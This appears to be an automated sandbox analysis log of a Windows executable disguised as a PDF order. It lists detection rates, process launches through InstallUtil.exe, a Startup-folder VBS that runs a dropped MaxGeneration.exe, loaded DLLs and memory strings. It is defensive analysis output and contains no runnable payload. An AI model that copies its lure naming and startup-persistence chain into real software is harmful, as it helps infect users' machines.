                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;'Oracle.DataAccess.Client.OracleBulkCopy%Microsoft.Data.SqlClient.SqlParameter
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000000.1671977310.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe.0.drBinary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM {0} LIMIT 0;
                    Source: Order88983273293729387293828PDF.exeReversingLabs: Detection: 31%
                    Source: Order88983273293729387293828PDF.exeVirustotal: Detection: 35%
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile read: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe"
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: thumbcache.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptnet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Order88983273293729387293828PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Order88983273293729387293828PDF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: Order88983273293729387293828PDF.exeStatic file information: File size 1484288 > 1048576
                    Source: Order88983273293729387293828PDF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x169c00
                    Source: Order88983273293729387293828PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Order88983273293729387293828PDF.exe, 00000000.00000002.1734653800.0000000004810000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.00000000037E5000.00000004.00000800.00020000.00000000.sdmp
